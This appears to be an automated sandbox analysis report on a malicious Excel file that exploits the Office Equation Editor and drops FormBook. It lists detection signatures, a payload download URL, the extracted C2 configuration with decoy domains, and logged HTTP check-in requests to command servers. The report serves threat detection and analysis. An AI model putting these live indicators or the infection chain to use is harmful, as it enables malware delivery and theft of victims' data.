Windows Analysis Report RFQ HCI20220113.xlsx

Overview

General Information

Sample Name:	RFQ HCI20220113.xlsx
Analysis ID:	552850
MD5:	da4befa8dfe9d56b937b01a2d2818175
SHA1:	cf8e6ae0b8afb3d3f2956fbe0c88599fb361ede8
SHA256:	87f4b613c197b92f31d5eed4c7ad32a8ba4ae68313d56b54ff656f273fb56d86
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

System process connects to network (likely due to code injection or exploit)

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.topeasyip.company/i5nb/"], "decoy": ["integratedheartspsychology.com", "tappsis.land", "norfg.com", "1531700.win", "oneplusoneexperience.com", "circlessalaries.com", "tlcremodelingcompany.com", "susalud.info", "liyanghua.club", "pink-zemi.com", "orphe.biz", "themodelclarified.com", "candidate.tools", "morotrip.com", "d2dfms.com", "leisuresabah.com", "bjbwx114.com", "lz-fcaini1718-hw0917-bs.xyz", "at-commerce-co.net", "buymypolicy.net", "5151vip73.com", "rentglide.com", "louiecruzbeltran.info", "lanabasargina.com", "lakeforestparkapartments.com", "guangkaiyinwu.com", "bornthin.com", "restaurantkitchenbuilders.com", "ecommerceoptimise.com", "datahk99.com", "markfwalker.com", "granitowawarszawa.com", "theyouthwave.com", "iabg.xyz", "jholbrook.com", "bsc.promo", "xn--grlitzerseebhne-8sb7i.com", "cafeteriasula.com", "plushcrispies.com", "dedicatedvirtualassistance.com", "ventura-taxi.com", "thoethertb434-ocn.xyz", "ylhwcl.com", "bigsyncmusic.biz", "terapiaholisticaemformacao.com", "comidies.com", "171diproad.com", "07dgj.xyz", "vppaintllc.com", "thepatriottutor.com", "wxfive.com", "ceinpsico.com", "tuningelement.store", "asinment.com", "diafraz.xyz", "8crhnwh658ga.biz", "redwolf-tech.com", "ksherfan.com", "sensationalshroom.com", "buy-instagram-followers.net", "treeserviceconsulting.com", "vnln.space", "kate-films.com", "selfmeta.club"]}

Multi AV Scanner detection for submitted file

Source: RFQ HCI20220113.xlsx	Virustotal: Detection: 33%			Perma Link
Source: RFQ HCI20220113.xlsx	ReversingLabs: Detection: 30%

Yara detected FormBook

Source: Yara match	File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://198.23.213.59/1155/vbc.exe	Avira URL Cloud: Label: malware
Source: www.topeasyip.company/i5nb/	Avira URL Cloud: Label: malware
Source: http://www.ylhwcl.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA==	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\Public\vbc.exe	Avira: detection malicious, Label: HEUR/AGEN.1211287
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1211287

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 43%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 43%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 5.2.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.9.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000002.520863272.0000000000A50000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483549508.0000000000740000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.482084370.00000000005E0000.00000004.00000001.sdmp, cmd.exe
Source:	Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop esi	5_2_0041584D
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi	5_2_004162F6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop edi	7_2_000D62F6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop esi	7_2_000D584D

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80

Source: C:\Windows\explorer.exe	Domain query: www.terapiaholisticaemformacao.com
Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.220 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 195.211.74.112 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ylhwcl.com
Source: C:\Windows\explorer.exe	Domain query: www.integratedheartspsychology.com
Source: C:\Windows\explorer.exe	Domain query: www.circlessalaries.com
Source: C:\Windows\explorer.exe	Network Connect: 221.121.143.148 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.topeasyip.company
Source: C:\Windows\explorer.exe	Network Connect: 216.172.160.188 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.80.120.93 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ecommerceoptimise.com
Source: C:\Windows\explorer.exe	Network Connect: 122.10.28.11 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.bjbwx114.com
Source: C:\Windows\explorer.exe	Network Connect: 192.185.98.251 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.orphe.biz

Source: Joe Sandbox View	ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View	ASN Name: AS45671-NET-AUWholesaleServicesProviderAU AS45671-NET-AUWholesaleServicesProviderAU

Source: global traffic	HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1Host: www.orphe.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.circlessalaries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1Host: www.ylhwcl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.terapiaholisticaemformacao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1Host: www.ecommerceoptimise.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.integratedheartspsychology.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1Host: www.bjbwx114.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jan 2022 19:23:06 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 26 Jul 2019 13:18:26 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jan 2022 19:23:11 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 14 Feb 2020 00:55:46 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 13 Jan 2022 19:23:17 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6

Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
